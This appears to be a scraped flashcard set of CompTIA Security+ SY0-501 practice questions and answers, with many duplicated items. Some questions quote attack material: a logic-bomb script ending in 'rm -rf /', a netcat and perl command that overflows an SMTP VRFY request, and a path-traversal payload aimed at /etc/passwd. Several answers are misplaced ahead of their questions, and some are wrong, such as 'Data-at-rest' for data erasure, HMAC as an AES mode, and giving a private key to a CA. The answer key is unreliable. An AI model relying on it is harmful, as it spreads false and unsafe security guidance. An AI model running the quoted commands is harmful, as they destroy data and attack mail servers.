CompTIA SY0-501 Security+, - Merged RM

¡Supera tus tareas y exámenes ahora con Quizwiz!

A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection?

$500

A Chief Information Officer (CIO) asks the company's security specialist if the company should spend any funds on malware protection for a specific server. Based on a risk assessment, the ARO value of a malware infection for a server is 5 and the annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the malware protection?

$500

You have an asset valued at $16,000. The exposure factor of a risk affecting that asset is 35%. The annualized rate of occurrence is 75%. What is the SLE?

$5600

A forensic analyst is asked to respond to an ongoing network attack on a server. Place the times in the list below in the correct order in which the forensic analyst should preserve them.

(1) CPU cache (2) ram (3) swap (4) hard drive

A security administrator has been tasked with implementing controls that meet management goals. Drag and drop the appropriate control used to accomplish the account management goal. Options may be used once or not at all.

(1) Easily differentiate between mobile devices and servers in reports = standard naming convention (2) Enforce password complexity requirements = group policy (3) Determine if devices used by terminated employees are returned = usage and auditing review (4) Identify which employees have access to sensitive file shares = permission auditing and review

A security analyst is assessing a small company's internal servers against recommended security practices. Which of the following should the analyst do to conduct the assessment? (Select two)

(1) Review the company's current security baseline (2) Run an exploitation framework to confirm vulnerabilities

Your company has hired an outside security firm to perform various tests on your network, specifically vulnerability scans. During this vulnerability scan, you provided the company with a set of usernames and passwords for various systems (database server, application server, web server) to assist in their scan. What best describes what is happening?

A Credentialed Scan

Shannon works for a security company that performs pen tests for clients. She's currently conducting a test of an e-commerce company and discovers that after compromising the web server, she can use the web server to launch a second attack into the company's internal network. What type of attack is this considered?

A Pivot

A security administrator has replaced the firewall and notices a number of dropped connections. After looking at the data the security administrator sees the following information that was flagged as a possible issue: Which of the following can the security administrator determine from this?

A SQL injection attack is being attempted

Agile

A development team has adopted a new approach to projects in which feedback is iterative and multiple iterations of deployments are provided within an application's full life cycle. Which of the following software development methodologies is the development team using?

Tabletop exercise

A director of IR is reviewing a report regarding several recent breaches. The director compiles the following statistic's -Initial IR engagement time frame -Length of time before an executive management notice went out -Average IR phase completion The director wants to use the data to shorten the response time. Which of the following would accomplish this?

Joe, the security administrator, sees this in a vulnerability scan report: "The server 10.1.2.232 is running apache 2.2.20 which may be vulnerable to a mod_cgi exploit" Joe verifies that the mod_cgi module is not enabled on 10.1.2.232. This message is an example of:

A false positive

It provides extended site validation

A security administrator is trying to encrypt communication. For which of the following reasons should administrator take advantage of the Subject Alternative Name (SAM) attribute of a certificate?

Alissa manages the network for her company, a health club chain. She's working to find a communication technology option that uses low power and can spend long periods in sleep modes. What technology would be the best fit?

ANT

Tanner is the network security administrator for his company that creates advanced routers and switches. He has noticed that his networks have been subjected to advanced attacks over a period of time. What term best describes this attack?

APT (Advanced Persistent Threat)

To determine the ALE of a particular risk, which of the following must be calculated? (Select two)

ARO SLE

To determine the ALE of a particular risk, which of the following must be calculated? (Select TWO).

ARO, SLE

As the security director, you identify a security risk to a planned network migration. You decide to continue with the current migration plan anyway since you deem it to be low risk. What type of response technique has been demonstrated?

Accept

A penetration tester harvests Potential usernames From a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using?

Active reconnaissance

A penetration tester harvests potential usernames from a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using?

Active reconnaissance

A company has noticed multiple instances of proprietary information on public websites. It has also observed an increase in the number of email messages sent to random employees containing malicious links and PDFs. Which of the following changes should the company make to reduce the risks associated with phishing attacks? (Select TWO)

Block access to personal email on corporate systems Update corporate policy to prohibit access to social media websites

A system administrator is reviewing the following information from a compromised server. (APACHE NO 0.0.0.0 10.130.210.20) Given the above information, which of the following processes was MOST likely exploited via remote buffer overflow attack?

Apache

Which of the following are methods to implement HA in a web application server environment? (Select two)

Application layer firewalls Load balancers

The computer resource center issue smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented with the type of tools the managers installed?

Application manager

The computer resource center issued smartphones to all first-level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implemented to control the types of tools the managers install?

Application manager

A global gaming console manufacturer is launching a new gaming platform to its customers. Which of the following controls reduces the risk created by malicious gaming customers attempting to circumvent by way of modifying consoles?

Automatic updates Firmware version control

An active/passive configuration has an impact on:

Availability

Caleb is installing an HVAC system in his data center and would like to know what this HVAC system will have the most impact on. Please choose from the following:

Availability

A product manager is concerned about continuing operations at a facility located in a region undergoing significant political unrest. After consulting with senior management, a decision is made to suspend operations at the facility until the situation stabilizes. Which of the following risk management strategies BEST describes management's response?

Avoidance

Ann, a college professor, was recently reprimanded for posting disparaging remarks re-grading her coworkers on a web site. Ann stated that she was not aware that the public was able to view her remakes. Which of the following security-related trainings could have made Ann aware of the repercussions of her actions? A. Data Labeling and disposal B. Use of social networking C. Use of P2P networking D. Role-based training

B

Two users need to securely share encrypted files via email. Company policy prohibits users from sharing credentials or exchanging encryption keys. Which of the following can be implemented to enable users to share enable users to share encrypted data while abiding by company policies? A. Key escrow B. Digital signatures C. PKI D. Hashing

B

The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats?

Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed

A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using?

Banner grabbing

A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using?

Banner grabbing

Of the following terms, which one refers to the process of establishing a standard for security?

Baselining

An external contractor, who has not been given information about the software or network architecture, is conducting a penetration test. Which of the following BEST describes the test being performed?

Black box

A new purchased corporate WAP needs to be configured in the MOST secure manner possible. Please click on the below items on the network diagram and configure them accordingly.

Basic settings: Network mode = G ONLY; network name = DEFAULT; channel = 11; SSID Broadcast = DISABLE Wireless Security: Security Mode = WPA2 Personal

Which of the following are used to increase the computing time it takes to brute force a password using an offline attack? (Select two)

Bcrypt PBKDF2

You've been asked to conduct a penetration test for a small company and for the test, you were only given a company name, the domain name of their website, and the IP address of their gateway router. What describes the type of test?

Black-Box test

A company would like to prevent the use of a known set of applications from being used on company computers. Which of the following should the security administrator implement?

Blacklisting

A company's user lockout policy is enabled after five unsuccessful login attempts. The help desk notices a user is repeatedly locked out over the course of a workweek. Upon contacting the user, the help desk discovers the user is on vacation and does not have network access. Which of the following types of attacks is MOST likely occurring?

Brute force Dictionary

What type of attack is based on sending more data to a target than the target can hold?

Buffer Overflow

When a program has variables and does not check the boundary values before inputting the data, what type of attack is this program vulnerable to?

Buffer Overflow

An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a Windows server. Given the following code: void foo (char *bar) { car random_user_input[12]; stropy (random_user_input, bar); } Which of the following vulnerabilities is present?

Buffer overflow

An analyst is reviewing a simple program for potential security vulnerabilities before being deployed to a Windows server. Given the following code: Which of the following vulnerabilities is present?

Buffer overflow

Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the OS?

Buffer overflow

During a routine vulnerability assessment, the following command was successful: Which of the following vulnerabilities is being exploited?

Buffer overflow directed at a specific host MTA

During a routine vulnerability assessmen,t the following command was successful: echo "vrfy 'perl -e 'print "hi" x 500 ' '" I nc www.company.com 25 Which of the following vulnerabilities is being exploited?

Buffer overflow directed at a specific hostMTA

A security administrator needs to address the following audit recommendations for a public-facing SFTP server: Users should be restricted to upload and download files to their own home directories only. Users should not be allowed to user interactive shell login. Which of the following configuration parameters shojld be implemented?

ChrootDirectory PermitTTY

A security administrator needs to address the following audit recommendations for a public-facing SFTP server: Which of the following configuration parameters should be implemented? (Select two)

ChrootDirectory PermitTTY

Shelton is the manager at one of your local branch banks. He wants to ensure all customer information isn't compromised when the employees step away from their desks for a day. What would be used to mitigate this concern?

Clean Desk

Kevin is concerned about authentication and permissions (he is responsible for database security for his company). Which should be his first step?

Conduct a Permissions Audit

The Chief Security Officer (CSO) has reported a rise in data loss but no break ins have occurred. By doing which of the following is the CSO most likely to reduce the number of incidents?

Conduct security awareness training

A security analyst is hardening a WiFi infrastructure. The primary requirements are the following: (1) the infrastructure must allow staff to authenticate using the most secure method. (2) the infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before granting access to the Internet. Given these requirements, which of the following statements BEST represents what the analyst should recommend and configure?

Configure a captive portal for guest and WPA2 Enterprise for staff

A security analyst is hardening a WiFi infrastructure. The primary requirements are the following: The infrastructure must allow staff to authenticate using the most secure method. The infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses before granting access to the Internet. Given these requirements, which of the following statements BEST represents what the analyst should recommend and configure?

Configure a captive portal for guest and WPA2 Enterprise for staff.

An organization has several production-critical SCADA supervisory systems that cannot follow the normal 30- day patching policy. Which of the following BEST maximizes the protection of these systems from malicious software?

Configure a firewall with deep packet inspection that restricts traffic to the systems.

A web application is configured to target browsers and allow access to bank accounts to siphon money to a foreign account. This is an example of which of the following attacks?

Cross-site scripting

Choose the attack that depends on the attacker entering JavaScript into a text area that is intended for users to enter text that can be viewed by other users:

Cross-site scripting

Which of the following techniques can bypass a user or computer's web browser privacy settings? (Select two)

Cross-site scripting Session hijacking

A Chief Executive Officer (CEO) suspects someone in the lab testing environment is stealing confidential information after working hours when no one else is around. Which of the following actions can help to prevent this specific threat? A. Implement time-of-day restrictions B. Audit file access times C. Secretly install a hidden surveillance camera D. Require swipe-card access to enter the lab

D

Stewart works for an organization where employees all have cloud-based solutions for data storage. Stewart has requested funding from the CIO in order to install a DLP solution. What security hazard, if any, is Stewart trying to solve?

Data Exfiltration through the cloud

Of the listed operations, which should you undertake to avoid mishandling of tapes, removal drives, CDs, and DVDs?

Data Labeling

Name a process of deleting data by sending an eraser to clear the instruction in an address of nonvolatile memory.

Data-at-rest

A technician is configuring a wireless guest network. After applying the most recent changes the technician finds the new devices can no longer find the wireless network by name but existing devices are still able to use the wireless network. Which of the following security measures did the technician MOST likely implement to cause this Scenario?

Deactivation of SSID broadcast

An incident response analyst at a large corporation is reviewing proxy data log. The analyst believes a malware infection may have occurred. Upon further review, the analyst determines the computer responsible for the suspicious network traffic is used by the Chief Executive Officer (CEO). Which of the following is the best NEXT step for the analyst to take?

Disconnect the CEO's workstation from the network

Nat noticed an attacker is trying to get network passwords by using software that attempts many passwords from a list of common passwords. What type of attack is this?

Dictionary

Which of the following would allow for the QUICKEST restoration of a server into a warm recovery site in a case in which server data mirroring is not enabled?

Differential backup

A system administrator is configuring a site-to-site VPN tunnel. Which of the following should be configured on the VPN concentrator during the IKE phase?

Diffie-Hellman

An organization wants to conduct secure transactions of large data files. Before encrypting and exchanging the data files, the organization wants to ensure a secure exchange of keys. Which of the following algorithms is appropriate for securing the key exchange?

Diffie-Hellman

A security administrator suspects that a DDoS attack is affecting the DNS server. The administrator access a workstation with the hostname of workstation01 on the network and obtains the following output from the ipconfig command: IP Address 192.168.1.26 Subnet Mask 255.255.255.0 Default Gateway 192.168.1.254 DNS Server Address 192.168.1.254 The administrator successfully pings the DNS server from the workstation. Which of the following commands should be issued from the workstation to verify the DDoS attack is no longer occurring?

Dig workstation01

Jason is worried about an email he received from a coworker. He's concerned about the validity of the email because the coworker denies sending it. How can he prove the origin of the email?

Digital Signature

A group of developers is collaborating to write software for a company. The developers need to work in subgroups and control who has access to their modules. Which of the following access control methods is considered user-centric?

Discretionary

A security administrator wants to implement a company-wide policy to empower data owners to manage and enforce access control rules on various resources. Which of the following should be implemented?

Discretionary access control

An organization is trying to decide which type of access control is most appropriate for the network. The current access control approach is too complex and requires significant overhead. Management would like to simplify the access control and provide users with the ability to determine what permissions should be applied to files, document, and directories. The access control method that BEST satisfies these objectives is:

Discretionary access control

You're looking to begin accepting electronic orders from a vendor and you want to ensure that people who aren't authorized cannot send orders. Your manager wants a solution that allows the opportunity to provide nonrepudiation. Which of the following would meet the specified requirements?

Digital Signatures

An information system owner has supplied a ner requirement to the development team that calls for increased non-repudiation within the application. After undergoing several audits, the owner determined that current levels of non-repudiation were insufficient. Which of the following capabilities would be MOST appropriate to consider implementing is response to the new requirement?

Digital signatures

A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk?

Disable NTLM

A security analyst is mitigating a pass-the-hash vulnerability on a Windows infrastructure. Given the requirement, which of the following should the security analyst do to MINIMIZE the risk?

Disable NTLM

A security administrator wants to configure a company's wireless network in a way that will prevent wireless clients from broadcasting the company's SSID. Which of the following should be configured on the company's access points?

Disable SSID broadcast

Wayne works for a large law firm and manages network security. It's common for guests who come to the law firm to need to connect to the WiFi. He wishes to ensure that he provides maximum security when these guests connect using their own devices, but also seeks to provide assurance to the guests that his company will have minimal impact on their devices. What is the best solution?

Dissolvable NAC Agent

Brady is the network administrator for his company where some users keep getting dropped from the network. When he checks the logs for that specific WAP, he finds that a deauthentication packet has been sent from those IP addresses. What seems to be happening?

Disassociate Attack

A security analyst is hardening a web server, which should allow a secure certificate-based session using the organization's PKI infrastructure. The web server should also utilize the latest security techniques and standards. Given this set of requirements, which of the following techniques should the analyst implement to BEST meet these requirements? (Select two)

Enable and configure TLS on the server Install an X-509-compliant certificate.

In a corporation where compute utilization spikes several times a year, the Chief Information Officer (CIO) has requested a cost-effective architecture to handle the variable capacity demand. Which of the following characteristics does BEST describe what the CIO has requested?

Elasticity

Of the following resources, which feature of cloud computing would involve deprovisioning resources as needed?

Elasticity

Jose is responsible for incident response at his company. There has been a breach of the network, recently, which was widespread and affected many computers. As a part of his incident response process, he will be collecting logs from his SIEM, which aggregates logs from 20 servers. Which of the following should be done first?

Event de-duplication

A penetration tester finds that a company's login credentials for the email client were being sent in cleartext. Which of the following should be done to provide encrypted logins to the email server?

Enable an SSL certificate for IMAP services

Of the following, choose a common security issue that is hard to control in large environments when a user has more rights, permissions, and privileges than the job requires. What is described by this scenario?

Excessive Privileges

Due to regulatory requirements, a security analyst must implement full drive encryption on a Windows file server. Which of the following should the analyst implement on the system to BEST meet this requirement? (Select two)

Enable and configure BitLocker on the drives Ensure the hardware supports TPM, and enable it in the BIOS

A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals outside of the premises?

Faraday cage

A bank uses a wireless network to transmit credit card purchases to a billing system. Which of the following would be MOST appropriate to protect credit card information from being accessed by unauthorized individuals outside of the premises?

Faraday cage

A datacenter recently experienced a breach. When access was gained, an RF device used to access an air-gapped and locked server rack. Which of the following would BEST prevent this type of attack?

Faraday cage

An organization is moving its human resources system to a cloud services provider. The company plans to continue using internal usernames and passwords with the service provider, but the security manager does not want the service provider to have a company of the passwords. Which of the following options meets all of these requirements?

Federated authentication

Company A has acquired Company B. Company A has different domains spread globally, and typically migrates its acquisitions infrastructure under its own domain infrastructure. Company B, however, cannot be merged into Company A's domain infrastructure. Which of the following methods would allow the two companies to access one another's resources?

Federation

Company A has acquired Company B. Company A has different domains spread globally, and typically migrates its acquisitions infrastructure. Company B, however, cannot be merged into Company A's domain infrastructure. Which of the following methods would allow the two companies to access one another's resources?

Federation

James is worried about how his company will respond to breaches. He's interested in finding a way that will identify files that have been altered during the breach. What is the best solution for him to implement

File Integrity Checker

Joe a website administrator believes he owns the intellectual property for a company invention and has been replacing image files on the company's public facing website in the DMZ. Jor is using steganography to hide stolen data. Which of the following controls can be implemented to mitigate this type of inside threat?

File integrity monitoring

Joe is concerned about attacks to an e-commerce server. He's especially concerned about a cross-site scripting attack and SQL injection. Which of the following would defend against these two attacks?

Filtering user input

After attempting to harden a web server, a security analyst needs to determine if an application remains vulnerable to SQL injection attacks. Which of the following wquld BEST assist the analyst in making this determination?

Fuzzer

After attempting to harden a web server, a security analyst needs to determine if an application remains vulnerable to SQL injection attacks. Which of the following would BEST assist the analyst in making this determination?

Fuzzer

Logan would like to test his company's web application and evaluate if it's handling input validation and data validation properly. Of the following, which testing method would be most effective for this scenario?

Fuzzing

Which of the following allows an auditor to test proprietary-software compiled code for security flaws?

Fuzzing

A mobile device user is concerned about geographic positioning information being included in messages sent between users on a popular network platform. The user turns off the functionality in the application but wants to ensure the application cannot re-enable the setting without the knowledge of the user. Which of the following mobile device capabilities should the user disable to achieve the stated goal?

GEO-Tagging

A security manager is creating an account management policy for a global organization with sales personnel who must access corporate network resources while traveling all over the world. Which of the following practices is the security manager MOST likely to enforce with the policy? (Select two)

Group-based access control Password complexity

An administrator intends to configure an IPSec solution that provides ESP with integrity protection, but not confidentiality protection. Which of the following AES modes of operation would meet this integrity-only requirement?

HMAC

Nicholas is looking for an authentication method that supports one-time passwords and works with the Initiative for Open Authentication. For this, the user will need unlimited time to use their password. Which of the following is the most beneficial?

HOTP (Hased Based - One Time Password)

As part of a corporate merger, two companies are combining resources. As a result, they must transfer files through the internet in a secure manner. Which of the following protocols would BEST meet this objective? (Select two)

HTTPS SFTP

The availability of a system has been labeled as the highest priority. Which of the following should be focused on the MOST to ensure the objective?

HVAC

Ashley is attempting to increase security at her company. She's currently creating an outline of all aspects of security that will need to be evaluated and acted on. Of the following terms, which one describes the process of improving security in a trusted OS?

Hardening

An organization electronically processes sensitive data within a controlled facility. The Chief Information Security Officer (CISO) wants to limit emissions from emanating from the facility. Which of the following mitigates this risk?

Hardening the facility with a Faraday cage to contain emissions produced from data processing

A user is presented with the following items during the new-hire onboarding process: "Hardware OTP token" Which of the following one component of multifactor authentication?

Hardware OTP token

A help desk technician receives a phone call from an individual claiming to be an employee of the organization and requesting assistance to access a locked account. The help desk technician asks the individual to provide proof of identity before access can be granted. Which of the following types of attack is the caller performing?

Impersonation

An audit takes place after company-wide restricting, in which several employees changed roles. The following deficiencies are found during the audit regarding access to confidential data: (everyone has access to multiple things which is a no no). Which of the following would be the BEST method to prevent similar audit findings in the future?

Implement regular permission auditing and reviews

A security auditor is putting together a report for the Chief Executive Officer (CEO) on personnel security and its impact on the security posture of the whole organization. Which of the following would be the MOST important factor to consider when it comes to personnel security?

Insider threats

Which of the following threats has sufficient knowledge to cause the MOST danger to an organization?

Insiders

A security analyst receives an alert from a WAF with the following payload: Var data= "<test test test>>" ++ <../../../../../../etc/passwd>" Which of the following types of attacks is this?

JavaScript data insertion

An accounting employee changes roles with other accounting employees every few months. What is this called?

Job Rotation

Rooting/jailbreaking Sideloading

Joe, an employee, wants to show his colleagues how much he knows about smartphones. Joe demonstrates a free movie application that he installed from a third party on his corporate smartphone. Joe's colleagues were unable to find the application in the app stores. Which of the following allowed Joe to install the application? (Select two.)

Josh manages network security at his company and has noticed that NTP is not working correctly. What security protocol will be affected by this?

Kerberos

You're responsible for network protocols. The network time protocol has been failing periodically. What is the most affected?

Kerberos

A security analyst is hardening an authentication server. One of the primary requirements is to ensure there are a mutual authentication and delegation. Given these requirements, which of the following technologies should the analyst recommend and configure?

Kerberos services

Your company is looking for a secure backup tool for key storage in a PKI. Which one would you recommend?

Key Escrow

When issuing a ticket, which of the following does Kerberos use?

Key distribution center

After a security incident, management is meeting with involved employees to document the incident and its aftermath. Which of the following BEST describes this phase of the incident response process?

Lessons learned

After a security incidnet, management is meeting with involved employees to document the incident and its aftermath. Which of the following BEST describes this phase of the incident response process?

Lessons learned

Legal authorities notify company that its network has been compromised for the second time in two years. The investigation shows the attackers were able to use the same vulnerability on different systems on both attacks. Which of the following would have allowed the security team to use historical information to protect against the second attack?

Lessons learned

Following the successful response to a data-leakage incident, the incident team lead facilitates an exercise that focuses on continuous improvement of the organization's incident response capabilities. Which of the following activities has the incident team lead executed?

Lessons learned review

Legal authorities notify a company that its network has been compromised for the second time in two years. The investigation shows the attackers were able to use the same vulnerability on different systems in both attacks. Which of the following would have allowed the security team to use historical information to protect against the second attack?

Lessonslearned

When identifying a company's most valuable assets as part of a BIA. which of the following should be the FIRST priority?

Life

You have noticed your company lacks deterrent controls. As the new security administrator, which of the following would you install that satisfies your needs?

Lighting

Paula is responsible for setting up a kiosk computer that will stay in the lobby of her company. It should be accessible for visitors to locate employee offices, obtain the guest WiFi password, and collect general public information from the company. What is the most important thing to consider before configuring this system?

Limiting functionality to only what's needed

Which of the following best describes what mobile content management (MCM) on a mobile device is used for?

Limiting the type of content that can be accessed on the device.

An information security specialist is reviewing the following output from a Linux server: user@server:~$ -l 5 * * * * /usr/local/bin.backup.sh user@server:~$ cat /usr/local/bin/backup.sh #!/bin/bash if ! grep --quiet joeuser /etc/passwd the rm -rf / fi Based on the above information, which of the following types of malware was installed on the server?

Logic bomb

Which of the following works by implanting software on systems but delays execution until a specific set of conditions is met?

Logic bomb

Which is a term for technical controls?

Logical Controls

A user has attempted to access data at a higher classification level than the user's account is currently authorized to access. Which of the following access control models has been applied to this user's account?

MAC

Grady is seeking access control methods that enforce authorization rules by the OS. Users cannot override authentication or access control policies. Which of the following best suits these needs?

MAC (Mandatory Access Controls)

As the security manager, you need to reduce the risk of employees working in collusion to embezzle funds. Which process would you implement?

Mandatory Vacations

A systems administrator is configuring a system that uses data classification labels. Which of the following will the administrator need to implement to enforce access control?

Mandatory access control

A systems administrator is configuring a system that uses data classification labels. Which of the following will the administrator need to implement to enforce access control?

Mandatory access control

An audit reported has identifies a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability?

Mantrap

An audit reported has identifies a weakness that could allow unauthorized personnel access to the facility at its main entrance and from there gain access to the network. Which of the following would BEST resolve the vulnerability?

Mantrap

Ann a security analyst is monitoring the IDS console and noticed multiple connections from an internal host to a suspicious call back domain. Which of the following tools would aid her to decipher the network traffic?

NETSTAT

Melanie is responsible for security devices at her company. She's currently concerned about detecting intrusions. She would like a solution that works across entire network segments. She also wants to ensure that false positives do not interrupt workflow. What's the best solution to consider?

NIDS (Network Intrusion Detection System)

A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant items. Which of the following BEST describe why this has occurred? (Select two)

Non-applicable plugins were selected in the scan policy The output of the report contains false positives

Which of the following would not be able to detect a security breach or malicious action that was committed by an internal employee?

Nondisclosure agreements (signed by employees)

Derrick is implementing virtualized systems in his network. He's currently using a Type I hypervisor. What operating system should be on the machines in order for him to install the hypervisor?

None

Stewart has instructed all administrators to disable nonessential ports on their local servers. Why are these protocols a security issue that matters?

Nonessential ports provide additional areas of attack

A software developer wants to ensure that the application is verifying that a key is valid before establishing SSL connections with random remote hosts on the internet. Which of the following should be used in the code? (Select two)

OCSP Software code private key

Attackers have been using revoked certificates for MITM attacks to steal credentials from employees of Company. Which of the following options should Company implement to mitigate these attacks?

OCSP stapling

Attackers have been using revoked certificates for MITM attacks to steal credentials from employees of Company.com. Which of the following options should Company.com implement to mitigate these attacks?

OCSP stapling

Which of the following would a security specialist be able to determine upon examination of a server's certificate?

OID

A business has recently deployed laptops to all sales employees. The laptops will be used primarily from home offices and while traveling, and a high amount of wireless mobile use is expected. To protect the laptops while connected to untrusted wireless networks, which of the following would be the BEST method for reducing the risk of having the laptops compromised?

OS hardening

Jacob is in charge of network security for an e-commerce company. He wants to ensure that best practices are being used for the website that his company hosts. Which of the following is the best option to consider?

OWASP (Open Web Application Security Project)

A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted media. Which of the following BEST describes the action performed by this type of application?

Obfuscation

A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries prior to transmission over untrusted media. Which of the following BEST describes the action performed by this type of application?

Obfuscation

A company wants to ensure that the validity of publicly trusted certificates used by its web server can be determined even during an extended internet outrage. Which of the following should be implemented?

Ocsp

A Chief Information Officer (CIO) recently saw on the news that a significant security flaw exists with a specific version of a technology the company uses to support many critical applications. The CIO wants to know if this reported vulnerability exists in the organization and, if so, to what extent the company could be harmed. Which of the following would BEST provide the needed information?

Penetration test

Which of the following are used to increase the computing time it takes to brute force a password using an offline attack?

PBKDF2 bcrypt

A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to another host?

Pivoting

A third-party penetration testing company was able to successfully use an ARP cache poisoning technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to the other host?

Pivoting

When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said that they are:

Pivoting

Matt is working as a security officer for his company. He noticed malware on one of the workstations and is concerned about the malware having multiple functions that might cause more security issues than currently detected. What is the best way to test this malware?

Place the malware in a sandbox environment for testing

An officer manager found a folder that included documents with various types of data relating to corporate clients. The office manager notified the data included dates of birth, addresses, and phone number for the clients. The office manager then reported this finding to the security compliance officer. Which of the following portions of the policy would the security officer need to consult to determine if a breach has occurred?

Pll

An organization is working with a cloud services provider to transition critical business applications to a hybrid cloud environment. The organization retains sensitive customer data and wants to ensure the provider has sufficient administrative and logical controls in place to protect its data. In which of the following documents would this concern MOST likely be addressed?

Service level agreement

As the security administrator, you're configuring data label options for your R&D file server. Standard users can label documents as contractor, public, or internal. Which label should be assigned to company trade secrets?

Proprietary

A network technician is trying to determine the source of an ongoing network based attack. Which of the following should the technician use to view IPv4 packet data on a particular internal network segment?

Protocol analyzer

A systems administrator wants to generate a self-certificate for an internal website. Which of the following steps should the systems administrator complete prior to installing the certificate on the server?

Provide the private key to the internal CA

A systems administrator wants to generate a self-signedcertificate for an internal website. Which of the following steps should the systems administrator complete prior to installing the certificate on the server?

Provide the private key to the internal CA.

A procedure differs from a policy in that it:

Provides step-by-step instructions for performing a task

Thomas is seeking options for controlling physical access to the server room. He would like a hands-free solution. Which of the following would be his best choice?

Proximity Cards

Company A agrees to provide perimeter protection, power, and environmental support with measurable goals for Company B, but will not be responsible for user authentication or patching of operating systems within the perimeter. Which of the following is being described?

Service level agreement

A security engineer is configuring a wireless network that must support mutual authentication of the wireless client and the authentication server before users provide credentials. The wireless network must also support authentication with usernames passwords. Which of the authentication protocols MUST the security engineer select?

PEAP

An analyst wants to implement a more secure wireless authentication for office access points. Which of the following technologies allows for encrypted authentication of wireless clients over TLS?

PEAP

A security engineer is configuring a system that requires the X.509 certificate information to be pasted into a form field in the Base64 encoded format to import it into the system. Which of the following certificate formats should the engineer use to obtain the information in the required format?

PEM

A system administrator wants to implement an internal communication system that will allow employees to send encrypted messages to each other. The system must also support non-repudiation. Which of the following implements all these requirements?

PGP

Ann, a security analyst, wants to implement a secure exchange of email. Which of the following is the BEST option for Ann to implement?

PGP

Task: Determine the type of attacks below by selecting an option from the dropdown list.

PHISHING: email sent to multiple users to a link to verify UN/PW on external site; WHALING: phone calls made to CEO of organization asking for various financial data; VISHING: phone call is made ... asked for the user's PW over the phone; SPIM: social media site instant message from a friend; SOCIAL ENGINEERING: a friend/colleague asks you questions of a personal nature

Your supervisor has asked you about protecting the privacy of personally identifiable information (PII) that is collected. As the security administrator, which is the best option to meet these requests?

PIA

Which of the following would provide additional security by adding another factor to a smart card?

PIN

Two users need to securely share encrypted files via email. Company policy prohibits users from sharing credentials or exchanging encryption keys. Which of the following can be implemented to enable users to share encrypted data while abiding by company policies?

PKI

Of the following cloud service models, which service provides the consumer with the infrastructure to create and host applications?

PaaS (Platform as a service)

While performing a penetration test, the technicians want their efforts to go unnoticed for as long as possible while they gather useful data about the network they are assessing. Which of the following would be the BEST choice for the technicians?

Packet sniffer

Of the listed principles below, which is NOT a common security policy type?

Parking Policy

Which of the following security actions would be equivalent to the concept of implementing a VLAN in the real world?

Partitioning the office building into separate departments on each floor

A highly complex password policy has made it nearly impossible to crack account passwords. Which of the following might a hacker still be able to perform?

Pass-the-hash attack

Cheyenne is doing a penetration test for a client's network and is currently gathering information from sources such as archive.org, netcraft.com, social media, and other information websites. What stage has just been described?

Passive Reconnaissance

Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system?

Passive Scan

An in-house penetration tester is using a packet capture device to listen in on network communications. This is an example of:

Passive reconnaissance

A security analyst is attempting to identify vulnerabilities in a customer's web application without impacting the system or its data. Which of the following BEST describes the vulnerability scanning concept performed?

Passive scan

Which of the following should a security analyst perform FIRST to determine the vulnerabilities of a legacy system?

Passive scan

Acme company requires their employees to change their passwords every three months. Hank struggles to remember new passwords so he keeps switching back and forth between two passwords. Which policy would help prevent this?

Password History

A security manager is creating an account management policy for a global organization with sales personnel who must access corporate network resources while traveling all over the world. Which of the following practices is the security manager MOST likely to enforce with the policy? (Select TWO)

Password complexity Location-based authentication

Despite having implemented password policies, users continue to set the same weak passwords and reuse old passwords. Which of the following technical controls would help prevent these policy violations?

Password complexity Password history

A hacker has a packet capture that contains: ....Joe Smith.........E289F21CD33E4F57890DDEA5CF267ED2.. ...Jane.Doe...........AD1FAB10D33E4F57890DDEA5CF267ED2.. ....John.Key..........3374E9E7E33E4F57890DDEA5CF267ED2.. Which of the following tools will the hacker use against this type of capture?

Password cracker

A hacker has a packet capture that contains: Which of the following tools will the hacker use against this type of capture?

Password cracker

An organization plans to implement multifactor authentication techniques within the enterprise network architecture. Each authentication factor is expected to be a unique control. Which of the following BEST describes the proper employment of multifactor authentication?

Proximity card, fingerprint scanner, PIN

A company's AUP requires: (Passwords must meet complexity requirements, Passwords are changed at least once every six months, Passwords must be at least eight characters long) An auditor is reviewing the following report: (last changed 90 days, 247 days) Which of the following controls should the auditor recommend to enforce the AUP?

Password expiration

Lamar manages the account management for his company. He's worried about hacking tools that use rainbow tables. Which of the following is the most beneficial for mitigating this threat?

Password length

